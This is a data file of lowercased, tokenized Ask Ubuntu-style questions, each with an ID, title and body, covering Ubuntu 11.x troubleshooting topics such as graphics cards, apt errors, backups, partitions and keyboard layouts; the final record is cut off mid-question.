89197	`` see also '' documentation referenced by man pages	i 'm noticing that at the bottom of some man pages in the `` see also '' section are references to documentation that are n't other man pages . for example , at the bottom of the man page for bash it references the following documents : bash reference manual , brian fox and chet ramey the gnu readline library , brian fox and chet ramey the gnu history library , brian fox and chet ramey portable operating system interface ( posix ) part 2 : shell and utilities , ieee i 'm aware i can google them and find them that way , but are they hiding anywhere on my system already ? i 'm aware the bash reference manual is available through info bash . is there something similar ( non-pdf -- - html , ascii , man page , or other info page ) for the others ?
89198	the following signatures were invalid	i use ubuntu 11.10 latest update , but when i change the ubuntu update server to the main server i get this error : sudo apt-get update ... ... ... ... hit http : //archive.ubuntu.com oneiric-security/universe translation-en fetched 198 b in 16s ( 11 b/s ) reading package lists ... done w : gpg error : http : //archive.ubuntu.com oneiric-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > i tried many solutions from google but nothing helps . any ideas ?
89202	sun java being dropped 'tbd ' but when ?	in this article https : //wiki.ubuntu.com/lucidlynx/releasenotes/java6transition i read that java from sun ( now from oracle ) is going to be dropped from the ubuntu repositories . our company uses this to enable a java application . since it 's publicly available we 're concerned about this . i tried to find an exact date when it will be 'autoremove sun-java ' and java applications would not work any longer . will there be a warning before such drastic measures take place ?
89205	how to permanently switch off discrete graphic card ?	i got a integrated gd , which is intel , and another discrete gd , amd radeon 6490 hd i am using ubuntu 11.10 1st , when i boot into windows , my gd is indeed amd radeon 6490 hd , but when i boot into ubuntu , it shows that i have amd radeon 6470 instead . 2nd , i try most methods only to install driver for my amd/ati graphic card . first by jockey ( fail , boot with unity 2d instead ) and install manually ( fail , boot into blank screen ) . 3rd , i give up using the amd/ati graphic card . then i got a new problem . both my graphic cards are powered on on startup , which causes my laptop to over heat . i view the content of /sys/kernel/debug/vgaswitcheroo/switch 0 : dis : : pwr:0000:01:00.0 1 : igd : + : pwr:0000:00:02.0 then i switch off igd using echo off > /sys/kernel/debug/vgaswitcheroo/switch and i get 0 : dis : : off:0000:01:00.0 1 : igd : + : pwr:0000:00:02.0 but after i reboot , the discrete graphic card is powered on again . how to solve this ?
89214	where do browsers save cookies and data ?	what is the default location for firefox or chromium web browser to store data.also where does the temporary data and cookies along with user profiles are stored ?
89218	how do programs make it into the software center ?	personally , i mostly trust downloading programs from the software center , and usually stay clear of ppas . do programs go through a process of going from a ppa to becoming part of the universe repository in the software center ? in the software center , it says canonical does not provide updates for system load indicator . some updates may be provided by the ubuntu community . for some programs . so if a bug is fixed for that program , do i have to wait until the next ubuntu version , or will the bug be patched next time i run my ubuntu update manager ? this may be related to the question ( not sure if i should edit the original question ) i noticed , some ppas have related projects . for example https : //launchpad.net/~indicator-multiload https : //launchpad.net/indicator-multiload they are both maintained by the same people . would the first one be a bleeding edge version of the application , where as the second one is related to the package that you can download from the software center ?
89219	is there a difference between swap and cache memory ?	i installed the indicator-multiload 0.2-0ubuntu1 from the software center . ( it 's very similar to the gnome panel indicator showing memory and cpu graphs ) when i click on the unity panel which shows the little memory graph , it says ; mem :1.451 gb cache : 2.581 . this is also represented in the color graph . however , when i load the system monitor , swap is at a flat 0 . is this normal , or could there be a bug in either the system monitor or panel indicator ?
89224	how to find out how many people have downloaded from ppas	how do i find out how many people use a particular ppa . i see on a particular ppa ; package build summary a total of 108 builds have been dispatched for this ppa . completed builds 108 successful 0 failed does that mean only 108 people have added this ppa to their sources list and installed the package ?
89230	bad ethernet connection in ubuntu 11.10	i am using ubuntu 11.10 . if am connect to internet by cable i have connection problems . internet is always really slow and sometimes is unplugged . i tried it at my friends too and its slow too . in windows i have no problem . thank you for your help and sorry for my english
89231	mouse scroll wheel is in a direction opposite to windows	i am using both windows 7 and ubuntu oneiric . the direction of mouse wheel scrolling is opposite for windows and oneiric . for example , for oneiric , i need to roll the wheel up to scroll down a page . how can this be reset ? i believe this is not the default setting .
89238	wireless disconnects when laptop unplugged from power source	my ubuntu 11.10 laptop does not connect to my home router when the power source has been disconnected . when plugged back into the mains , the wireless starts working again . i have a hp pavilion dv6 . can anyone help ? thanks .
89239	will my files be compatible if i migrate to ubuntu ?	i am thinking of migrating my windows 7 to ubuntu 11.10 , i want to know if my documents microsoft word microsoft excel pdfs audio ( mp3 , wav ) video i made some in a avi format i got some from the internet messenger logs + contact info etc ... will be compatible with ubuntu 11.10 thanks
89241	how can i run ubuntu without a hard drive ?	i have a laptop with no hard drive . ( it 's dead and gone . ) i want to boot and run ubuntu from a usb flash drive . ( not just a 'test drive ' . ) first question : is there a difference between a liveusb 'install ' stick and a liveusb 'run ' stick ? i have used the 'universal usb installer ' from pendrivelinux.com to make a 'liveusb ' stick with ubuntu 11.10 . it seems to run fine the first time i use it , but on subsequent boots , it has a variety of problems . is this stick what i want for the scenario i described , or should i somehow install linux to a bootable usb flash drive ? ( how ? ) thanks . edit : additional info : thanks , all , for your feedback . the installer wo n't install to my 4gb stick because it required 4.3 gb . that 's as far as i got . i hope to continue this exercise at some later date .
89242	how to split all the files in a directory in to 4gb files to a different directory ?	i have a directory containing several large files that are each greater than 4gb . i want to copy all of those files to a different directory ( happens to be a fat32 usb drive mounted ) , but split the files down to 4gb ( since the destination drive is limited to that size files ) . i tried this : split -b 4096g /var/lib/backuppc/images/* /usbdrive/ but i get a split : extra operand `/var/lib/backuppc/images/xxxxxxxxxmyfilesname.tib' am i doing something wrong ? ( also tried `` 4g '' instead of 4096g , no difference )
89244	how to disable automount in nautilus 's preferences	i am using ubuntu 11.10 ( 64 bits ) and i do not want to mount automatically usb thumb drives in my system . i tried the command dconf-editor and gconf-editor but there is n't the icon to disable it in nautilus preferences ( apps|nautilus|preferences|media_automount ) . thanks .
89245	what is the latest news with adobe air ?	what are the latest news with adobe air ? is someone planing to develop a support for air . my business is using adobe air for digital signage software on pc . i prefer linux but without support or any other solution for air it means i need to buy windows licenses . : (
89251	how to install node.js 0.4.7 ?	i am going to develop a node.js application which will run on heroku . this means i will need to install node.js version 0.4.7 on my ubuntu 11.04 -- though the version from the distribution repository is 0.2.6 . what is the recommended way to install it ? ( i was able to download the tarball containing the source from nodejs 's web site and compile it , but i 'd rather not do sudo make install because i 'd like to be able to install it in my home directory ( or , if needed to have it system-wide , have a clean way to do an uninstall ) . note : i 've seen how do i install node.js ? but i do n't want either to sudo make install nor install the latest release from the ppa .
89254	automatic updates and update caches	i am considering trying to build a portable it system to support job clubs here in the uk ( operating as a charitable enterprise ) , but have a couple of hurdles to overcome . the solution i have in mind will incorporate up to 10 laptops sharing a common router , portable server and other network facilities like printer , etc . firstly , i have avoided using windows because of the excessively large number of updates , extra security software required to keep it stable and malware-free as well as the high cost of support and maintenance needed . i like mac os x as it is rock-solid stable , updates are automatic , not too frequent and not too large , but the hardware carries a high premium . i have played with a couple of variants of linux , but found that some require regular manual updates every week , which makes support a pain . q1 . can ubuntu be configured for automatic updates for all its software , so that it is completely transparent to the end-user ? i basically do not want the end-users fiddling with ubuntu or any of its applications at all , but at the same time need it to keep itself up to date as far as is possible with minimal intervention . secondly , i have limited bandwidth in some places the system will be used at ( e.g . where no landline-based broadband is available ) and it will have to run over a 3g wireless internet connection . in this situation i do not want updates to run as bandwidth is precious . also , even when on the main base-site which has fixed-line broadband , updates for 10 machines will consume a lot of bandwidth . i know that if i were to implement a solution based on mac os x , the os x server can be configured to act as a local update cache server . e.g . each of the client laptops would pull their updates from the local lan server rather than apple 's main update server . thus update-related bandwidth would be reduced to 10 % of what it would be without the update server on the lan . q2 - does ubuntu have the ability to time when updates are done ( e.g . delay an update until it is at a high-bandwidth site ? ) q3 - does ubuntu have the ability to use a local lan-based server as an update cache instead of having to pull updates across from ubuntu 's main repositories ?
89258	home folder has limit on size , how to remove it ?	how to understand that picture ? home 6.4 % and user folder 100 %
89271	how to move a part of my files to another ubuntu one account ?	i want to give a part of my files to another ubuntu one account , in cause of change of responsibilities ... by now , the files are originally stored on my computer and shared to the other account . from now on , it should by vice-versa ! the other account should be the source . how can i do this ?
89276	stopped discovering printers	ubuntu 11.10 today on one machine has stopped discovering printers the tick is in the box and noone has changed the settings . the cups print server is working fine as other ubuntu laptops see the printers and so does windows machines . i have restarted cups on that machine but nothing seems to happen , it can see only the local usb printer and see the cups shared printers on the server but will not connect to them any idea please .
89279	listening to incoming libnotify notifications using dbus	i am attempting to filter every notification through espeak . however , i ca n't seem to find a way to get the notification body from a python script , or even what signal_name to listen to . bus.add_signal_receiver ( espeak , dbus_interface= '' org.freedesktop.notifications '' , signal_name= '' ? ? '' ) trying to google for this only seems to yield results involving creating new notifications , so i am completely lost now . anyone can help me with this ? in short , what i want is to listen for incoming notifications using python , and obtaining the `` body '' attribute of the notification .
89280	dual boot problems	i have installed ubuntu 11.10 and now windows 7 cant boot .on startup the screen showing the operating systems appears and i have selected win 7 but the system automatically boot with ubuntu .using disc utility tool i can see the partitions having ntfs file systems .please help me to fix the error . ( i have tried to repair with win 7 cd ) thanking you .dilip .
89281	ubuntu does not shut down properly	when i select 'shut down ... ' from the menu , ubuntu shuts down but , right at the end of the shutdown , there 's a very nasty click ! from the hard disk drive . this is a sound i know very well from experience . i 'm concerned that if ubuntu keeps doing this it will eventually break the hard drive . the drive is a seagate st31000524as 1tb , and this is a quite new desktop computer . is there something i can do to make ubuntu shut the drive down more gently ?
89282	how do i properly auto start skype in gnome3 ?	clean install of 11.10 . tried unity and really struggled and have switched to gnome-shell . i have set up skype as a startup application . it starts up properly , but not sure what to do without without keeping it fully open . if i close it , the application completely closes . in 10.10 i was able to close it , and it appeared in the top panel notification area . i have installed the gnome-shell-classic-systray extension . also skypenotificationextension but these appear to do nothing . if i close skype , skype will still run but there is no way to get to it interface wise . if i kill all instances , then restart skype manually . it does appear in the panel properly . i suppose this maybe a timing issue , but i do n't know how to automatically delay skype until everything else completes .
89283	is it possible to install a swedish font ?	ok , so i 'm going to install swedish font on ubuntu , but i do n't know it 's package name . anyone knows it 's name ? i will be glad .
89285	how to install 11.10 on sun v65x ( potential aic79xx issue )	i have a sun v65x which i believe has an internal adeptec aic7902 h/w raid controller . i have installed ubuntu 11.10 , and the symptom is that the system goes through the h/w checks , post , and then hangs ( presents a black screen ) when it should be hitting the boot loader or os boot strap . the recipe for installing redhat on this box ( one of the original supported operating systems ) , was to perform some post-installation process of getting the driver installed and making a command line change in the kernel line in grub.conf . /etc/modules.conf was also updated , i believe . its been a while , so my memory is a bit weak on the details . i want to get ubuntu running on this box and would appreciate any tips on this procedure .
89287	dell inspiron 17r with nvidia optimus	i 've just installed ubuntu 11.10 on my new dell and i 've had troubles starting . after adding acpi=off to the boot options it at least boots now . right now i 'm struggling with nvidia optimus . because i messed my last install up , i completely reinstalled ubuntu and did the following : downloaded nvidia driver ( 525m ) from nvidia website & installed it installed ironhide and configured it rebooted now unity3d is n't working anymore ( it worked before the nvidia driver ) and i ca n't run optirun because of the missing acpi ( that 's the error : cat : /sys/class/power_supply/*/online : no such file or directory ) so i 'm really stuck right now and i do n't really know where the problem is .
89288	how can i monitor my samba traffic ?	i 've got a directory shared on my network , using samba . people on the netwerk use this samba share to download files from my share to their computers . i 'm interested in what files are downloaded most , and by which users they are downloaded . i 'd like to see this in real time , if possible . is there a program that allows me to do this ? if yes , how can i use it ? i 'm using ubuntu 11.10 .
89290	how do i get an advent aw10 printer working ?	has anyone managed to get any of the advent aw series printers working with linux ? advent support states '' all-in-one printers do not support linux os at this time . the all-in-one printers are designed to work with windows xp , windows vista , and windows 7 operating systems and with mac os 10.4.8 or higher . '' i wish i had read their website before purchasing the thing ! any help much appreciated
89311	login as different user in gnome if you are have root privileges	i want to login as a different user in gnome and not to run a single program only , but i do n't know the users password , i do n't want to know it and i do n't want to change it , but i 'm sudoer . is there any way to do so ? the best thing i could think , was to change the user 's password but to keep the old shadow file . but this seems to me very ugly and also uncomfortable . i 'm also not sure if it 's a good idea to change the shadow file on a running machine ( but i suppose so , otherwise vipw -s would kind of useless ) . is there an alternative ? the reason i want to achieve this , is that i 'd like to test things or to configure programs for users who are n't able to do on their own . yeah of course i could do everything on the shell als root or as the specific user ( and acutally this is what i 'm doing until now ) , but there are things that you definitly do n't want to do on the shell . did any of you ever try to change the position of the gnome-panel on the shell instead of just selecting `` bottom '' ? : ) i do n't think gksudo , sudo or su would help me . i want to have the whole gnome session .
89316	an app to create files and folders from a given structure	i 've seen an app for mac called structurer ( here a video http : //www.youtube.com/watch ? v=kxrjnefts6q ) which given a structure of files and folders like this : /folder1 /folder2 /file1 /folder2.1 /file2.1 will create this files and folders in a existing place . there is something like that for ubuntu , or how can i build a shell script to get something like this ? if is possible would be cool also to be able to create files using templates .
89321	how to restore a mozbackup file made in windows 7 ?	i made a complete backup of firefox , i used mozbackup , while on windows 7 . how do i restore a mozbackup made archive ( .pcv ) in ubuntu using firefox ?
89323	can you help me remotely backup my filesystem ?	the institution i work for wants me to backup the entire filesystem of a server and store it on another server . both servers are running the latest release of ubuntu . i 'm having a little bit of trouble trying to figure out not only how to do this , but how to do this remotely , so i 'm hoping the brilliant minds here can give me some guidance . my train of thought for how i should accomplish this goes like this : first , i need to tar up the entire filesystem of server 1 . i know i 'll need to exclude the /proc directory when i do this ( and of course i 'll need sudo ) . i 'm having a bit of trouble figuring out what the tar command could be used to accomplish this . after i have an archive of the filesystem i need to send the archive from server 1 to server 2 . what command would i do this with ? finally , i 'm going to be doing all of this remotely so how do i launch my commands so that they continue running if the connection on my end were to time out ? should i use screen commands ? should i use nohup ? thanks in advance for your time , i truly appreciate it .
89324	touchpad stops working after suspend on a clevo m55n	simple problem : touchpad stops working after suspend in ubuntu 11.10 . it is an annoying problem as i like to use my touchpad together with my mouse for convenience ( unless i must use my touchpad because the mouse is n't available ) . can anyone help ? i also posted a comment under this unsolved question for a similar problem in 10.10 : touchpad stopped working after suspend , never woke up again laptop make and model : clevo m55n . xinput list in terminal gives : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ genius 2.4g wireless mouse and keyboard id=11 [ slave pointer ( 2 ) ] ⎜ ↳ imps/2 elantech touchpad id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ genius 2.4g wireless mouse and keyboard id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] thanks beforehand .
89325	can i run u1 on an ubuntu server ?	we are running some groupware ( group-office ) on an ubuntu server , however it suports syncing only for calendars , addresses and notes , but not for files . how could i sync a folder on the ubuntu server with ubuntu one , without installing gnome ? is there any command line interface to tell my server how to connect to the ubuntu one account ?
89329	removing openjdk-6-jre without the installation of sun-java6-jre	i have alrady installed ( manually , from the .bin file ) the latest jre ( version 6 update 30 ) from oracle and now i want to remove the openjdk-6-jre . however , apt forces me to install old ( version 6 update 26 ) sun-java6-jre ! so , can i remove the openjdk-6-jre ( and the icedtea plugin ) without installing sun-java6-jre ? or is it trivial to try to remove openjdk-6-jre as it is `` harmless '' ? sudo apt-get remove openjdk-6-jre-headless reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : sun-java6-bin sun-java6-jre suggested packages : sun-java6-plugin ia32-sun-java6-plugin sun-java6-fonts ttf-kochi-gothic ttf-sazanami-gothic ttf-kochi-mincho ttf-sazanami-mincho ttf-arphic-uming the following packages will be removed : default-jre default-jre-headless icedtea-6-jre-cacao libcommons-beanutils-java libcommons-digester-java openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib the following new packages will be installed : sun-java6-bin sun-java6-jre 0 upgraded , 2 newly installed , 8 to remove and 0 not upgraded . need to get 0b/35,1mb of archives . after this operation , 12,3mb of additional disk space will be used . do you want to continue [ y/n ] ?
89334	can i undo file operations ?	when do you think to add the `` undo file operations '' like windows does ? if ( for a mistake ) i move a file i want to crtl+z to undo the operation .
89336	can i install ubuntu from a external hard drive ?	i have a very simple question ... is it possible to install ubuntu from a external harddrive ? if it is where can i get information on to do it ? thanks in advance for any help .
89345	making a udp application go through a proxy ?	i am using ubuntu 11.10 . in system settings - > network i can add a socks proxy but it does n't work with my udp application or even firefox ( it just connects using my real ip ) . what do i need to do to send my udp program 's data through a proxy ?
89348	how do i fix my keyboard mapping ?	i am using gnome3/gnome shell/ubuntu 11.10 . today , when i began using my machine , it would not co-operate with me . trying to type simple documents , my shift-p was captured -- and spawned an xterm window ! i have no idea how i may have caused this anomaly . but i searched the various locations trying to find the culprit ... i checked the `` shortcuts '' tab of the `` system settings|hardware|keyboard '' applet ... no assignment to shift-p in any of these lists ... i checked the commands panel in `` compizconfig settings manager '' ( from gnome menu|other ) ... no assignment there either . after reading some other related keymapping issues asked in askubuntu , i brought up the xev application to see what it would report ... while programmatically pressing each key on the keyboard , examining the report from xev , i learned that shift-w-w is also mapped to bring up an xterm ! while exploring , it appears ( using ps -ef ) , that both commands are mapped to `` sh -c xterm '' ... how can i fix this ? i do n't know where to turn next . ps -ef reports three processes being initiated each time i press shift-p ( or shift-w-w ) : * sh -c xterm * xterm * bash can anyone help me to troubleshoot this problem ? update the problem boiled down to an issue with my .xbindkeysrc.scm file . i had explored a tutorial on the topic some weeks back and had downloaded a tutorial ( .xbindkeysrc.scm ) file . after playing with the tutorial for a little while , i disabled the file . when doing some housekeeping on my system this morning , i inadvertently re-enabled the file . this caused the mysterious behavior .
89351	ca n't solve serious partition problem after an accident in the grub menu	i previously had a dual-boot with windows7 and ubuntu 11.04 . i had partitioned my 320 gb hard-disk into to partitions with about 100 gb for ubuntu and the rest was reserved for win7 . i then upgraded to 11.10 and everything worked just fine . my problems started when i accidentally choose the wrong option in the grub menu . i imagine it was something like the windows recovery-option because it led me to the `` acer erecovery system manager '' . the computer worked for sometime and came up with these three options ( not sure if these were the exact words , but still ) : delete all on the hard-disk and reset the computer to factory default settings . save all personal data and then reset the computer to factory default settings . exit . as i just wanted to boot windows i opted for choice number 3 ( exit ) . the computer then shut down and when i started it up again i got the grub-rescue menu . i then got into a lot of problems , but i managed to save all my documents from the win7 and ubuntu partitions by using a livecd for ubuntu 11.04 . at this moment gparted told my that the old partition reserved for ubuntu was unallocated , but it still showed me the win7 partition . at the moment i got the windows 7 up and running , but i want to get back to ubuntu ! ! so that was a long story , but i thought it may be important . i have partially abandoned the idea of getting back to ubuntu as before , so now i 'm trying to install ubuntu 11.10 from a livecd . when i get to the installation type in the install menu i get this : ( edit : figured out i 'm not allowed to post images ... ) the menu shows that i may only chose the /dev/sda which has 320.1 gb . gparted gives me this : ( edit : figured out i 'm not allowed to post images ) gparted shows that i got no partitions and the whole /dev/sda section is unallocated ( 298.09 gb ) . so where have my partitions gone now they have to be there somewhere becausesudo fdisk -l` gives me this : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x93859385 device boot start end blocks id system /dev/sda1 2048 24578047 12288000 27 hidden ntfs winre /dev/sda2 * 24578048 24782847 102400 7 hpfs/ntfs/exfat /dev/sda3 24782848 508650024 241933588+ 7 hpfs/ntfs/exfat /dev/sda4 508650030 625153409 58251690 f w95 ext 'd ( lba ) /dev/sda5 508651520 616964095 54156288 83 linux /dev/sda6 616966144 625141743 4087800 82 linux swap / solaris so my question is : what should i do to get installed ubuntu on my computer as before ? it does n't really bother me if i have to reinstall ubuntu , but if you think it 's possible to save the old version lost somewhere on my hard-disk i 'd be grateful : -d here are some information about my cpu : ubuntu @ ubuntu : ~ $ cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 23 model name : genuine intel ( r ) cpu u4100 @ 1.30ghz stepping : 10 cpu mhz : 1200.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm xsave lahf_lm dts bogomips : 2593.34 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 23 model name : genuine intel ( r ) cpu u4100 @ 1.30ghz stepping : 10 cpu mhz : 1200.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm xsave lahf_lm dts bogomips : 2593.48 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management :
89352	does ubuntu periodically clean empty directories under /var/run ?	i 've noticed that empty directories get deleted from /var/run/ on reboot . i 'm wondering if that 's something ubuntu does or something that i have installed .
89353	network disabled	i 'm running ubuntu 11.04 on virtualbox . everything worked fine until i had to install a wirelsss network card to my stationary ( network cabel outside house was damaged - so borrowing neighbour network ) . now i only get network disabled . my nettwork file looks like this : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # networkmanage # iface eth0 inet dhcp i 've tried `` enabling '' iface eth0 inet dhcp , but that only made restarting the network hang . i 've tried creating a new wired connection , but that did n't help either . running ifconfig gives me this info : eth0 link encap : ethernet hwaddr 08:00:27 : eb : ac:42 inet6 addr : fe80 : :a00:27ff : feeb : ac42/64 scope : link up broadcast running multicast mtu:1500 metric:1 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host any help much appreciated ! update user @ ubuntu : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions .
89359	why are n't my files getting preserved across reboots ?	i 've managed to get a wubi installation onto my usb flash drive , which works on both virtualbox and on a native computer . ( the data is on the root.disk file . ) it works completely fine , except for one little caveat : the files i create or modify do n't actually persist on the drive ! my grub.cfg : menuentry `` ubuntu , linux 2.6.38-13-generic '' { insmod part_msdos insmod ntfs set root= ' ( /dev/sdb , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 02e8d1d3e8d1c4d7 loopback loop0 /ubuntu/disks/root.disk set root= ( loop0 ) linux /boot/vmlinuz-2.6.38-13-generic root=uuid=02e8d1d3e8d1c4d7 loop=/ubuntu/disks/root.disk ro acpi_sleep=nonvs acpi_osi=linux acpi_backlight=vendor splash initrd /boot/initrd.img-2.6.38-13-generic } my fstab : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /host/ubuntu/disks/root.disk / ext2 loop , errors=remount-ro 0 1 ideas on why this is happening ?
89363	why does n't steam work on wine ?	i just installed steam on ubuntu 11.10 and it will start and everything , but as soon as i click on `` store '' it crashes . please help me as soon as you can . are there extra things that i need to do with wine to make this work ? for those of you who may have installed wine , what did you do . i am so unsure why this is happening .
89364	force network-manager to use wireless for an internet connection	i have a ubuntu 10.10 laptop running two virtualbox machines that i want to use to demonstrate how an application can connect to a networked database . i use a stand-alone ( not connected to the internet ) billion route to ensure the ip addresses of the virtual machines stay constant . i need to connect the host computer to the internet but i understand that network-manager automatically uses the wired network for internet connections . how can i force network-manager to use a wireless or usb tethered device for the internet connection while maintaining a wired connection ?
89365	how long does a distribution upgrade normally take ?	as the title says , how long does a distribution upgrade ( e.g . from 11.04 to 11.10 ) usually take , discounting the download phase ? i 've been upgrading from natty to oneiric , the download only takes about 1 hour , but now i 've been in the `` installing the upgrades '' phase for more than 5 hours already . the progress bar has been stuck saying `` about 2 hours 55 minutes remaining '' in the last 3 hours , and the remaining time is not decreasing . the detailed view ( terminal view ) still scrolls printing stuffs that it 's installing , so the upgrade is still running , albeit ever so slowly . in short , is it normal that the ubuntu upgrade takes this long ? fresh install , as i remember , takes about an hour or so from inserting the cd to booting to the harddisk ; i had expected that an upgrade may take longer than fresh install , but not by this much . second question , why does it take so long to upgrade vs fresh install ? certainly not the download time , since that takes about the same time , about an hour for both fresh install and upgrade . it 's the installation phase that takes so long . update : the upgrade finally finishes a couple hours after i posted , i 'm still not sure why it takes so long ; however when debugging another ( possibly ) unrelated performance problem in my program ( running on this same laptop ) , i found out that sqlite is excruciatingly slow on ext4 ( in my case , a 10 second operation turns to 5 minute ) , because ext4 enabled write-barrier by default . the root of the slow upgrade might be the same since distribution upgrade also involves a lot of disk writes .
89366	how do i create a new keyboard layout ?	i have a trouble like this . i want to create a new custom layout because i want to use the cirillic alphabet on an italian keyboard changing less keys i can . i made my file in /usr/share/x11/xkb/symbols directory and i changed evdev.xml and evdev.lst files in /usr/share/x11/xkb/rules . opening preferences keyboard setting window i can find my new layout but when i select it an error is notified to me : errore nell'attivare la configurazione xkb . le cause di ciò potrebbero essere diverse . per segnalare questa situazione come bug , includere i risultati dei comandi : • xprop -root | grep xkb • gsettings get org.gnome.libgnomekbd.keyboard model • gsettings get org.gnome.libgnomekbd.keyboard layouts • gsettings get org.gnome.libgnomekbd.keyboard options executing the commands i obtain : xprop -root | grep xkb _xkb_rules_names_backup ( string ) = `` evdev '' , `` pc105 '' , `` it '' , `` '' , `` '' _xkb_rules_names ( string ) = `` evdev '' , `` pc105 '' , `` it , ru '' , `` , '' , `` grp : shifts_toggle '' gsettings get org.gnome.libgnomekbd.keyboard model '' gsettings get org.gnome.libgnomekbd.keyboard layouts [ 'it ' , 'ru ' , ' ru_it ' ] gsettings get org.gnome.libgnomekbd.keyboard options [ 'grp\tgrp : shifts_toggle ' ] my layout file is this : partial alphanumeric_keys xkb_symbols `` ru_it '' { include `` latin ( type4 ) '' name [ group1 ] = “russian ( on italian keyboard ) ” ; ! ! ! ! ! trouble is here ! ! ! ! ! ! ! ! ! key < ab01 > { [ cyrillic_ya , cyrillic_ya , z , z ] } ; // я я z z key < ab02 > { [ cyrillic_che , cyrillic_che , x , x ] } ; // ч ч x x key < ab03 > { [ cyrillic_es , cyrillic_es , c , c ] } ; // с с c c key < ab04 > { [ cyrillic_em , cyrillic_em , v , v ] } ; // м м v v key < ab05 > { [ cyrillic_i , cyrillic_i , b , b ] } ; // и и b b key < ab06 > { [ cyrillic_te , cyrillic_te , n , n ] } ; // т т n n key < ab07 > { [ cyrillic_softsign , cyrillic_softsign , m , m ] } ; // ь ь m m key < ab08 > { [ cyrillic_be , cyrillic_be , comma , semicolon ] } ; // б б , ; key < ab09 > { [ cyrillic_yu , cyrillic_yu , period , colon ] } ; // ю ю . : key < ab10 > { [ minus , underscore , dead_doubleacute , dead_doubleacute ] } ; // - _ key < ac01 > { [ cyrillic_ef , cyrillic_ef , a , a ] } ; // ф ф a a key < ac02 > { [ cyrillic_yeru , cyrillic_yeru , s , s ] } ; // ы ы s s key < ac03 > { [ cyrillic_ve , cyrillic_ve , d , d ] } ; // в в d d key < ac04 > { [ cyrillic_a , cyrillic_a , f , f ] } ; // а а f f key < ac05 > { [ cyrillic_pe , cyrillic_pe , g , g ] } ; // п п g g key < ac06 > { [ cyrillic_er , cyrillic_er , h , h ] } ; // р р h h key < ac07 > { [ cyrillic_o , cyrillic_o , j , j ] } ; // о о j j key < ac08 > { [ cyrillic_el , cyrillic_el , k , k ] } ; // л л k k key < ac09 > { [ cyrillic_de , cyrillic_de , l , l ] } ; // д д l l key < ac10 > { [ cyrillic_zhe , cyrillic_zhe , at , eurosign ] } ; // ж ж @ € key < ac11 > { [ cyrillic_e , cyrillic_e , numbersign , degree ] } ; // э э # ° key < ad01 > { [ cyrillic_shorti , cyrillic_shorti , q , q ] } ; // й й q q key < ad02 > { [ cyrillic_tse , cyrillic_tse , w , w ] } ; // ц ц w w key < ad03 > { [ cyrillic_u , cyrillic_u , e , e ] } ; // у у e e key < ad04 > { [ cyrillic_ka , cyrillic_ka , r , r ] } ; // к к r r key < ad05 > { [ cyrillic_ie , cyrillic_ie , t , t ] } ; // е е t t key < ad06 > { [ cyrillic_en , cyrillic_en , y , y ] } ; // н н y y key < ad07 > { [ cyrillic_ghe , cyrillic_ghe , u , u ] } ; // г г u u key < ad08 > { [ cyrillic_sha , cyrillic_sha , i , i ] } ; // ш ш i i key < ad09 > { [ cyrillic_shcha , cyrillic_shcha , o , o ] } ; // щ щ o o key < ad10 > { [ cyrillic_ze , cyrillic_ze , p , p ] } ; // з з p p key < ad11 > { [ cyrillic_ha , cyrillic_ha , bracketleft , bracketright ] } ; // х х [ ] key < ad12 > { [ cyrillic_hardsign , cyrillic_hardsign , plus , asterisk ] } ; // ъ ъ + * key < ae01 > { [ 1 , exclam , dead_doubleacute , dead_doubleacute ] } ; // 1 ! key < ae02 > { [ 2 , quotedbl , dead_doubleacute , dead_doubleacute ] } ; // 2 quotedbl key < ae03 > { [ 3 , sterling , dead_doubleacute , dead_doubleacute ] } ; // 3 £ key < ae04 > { 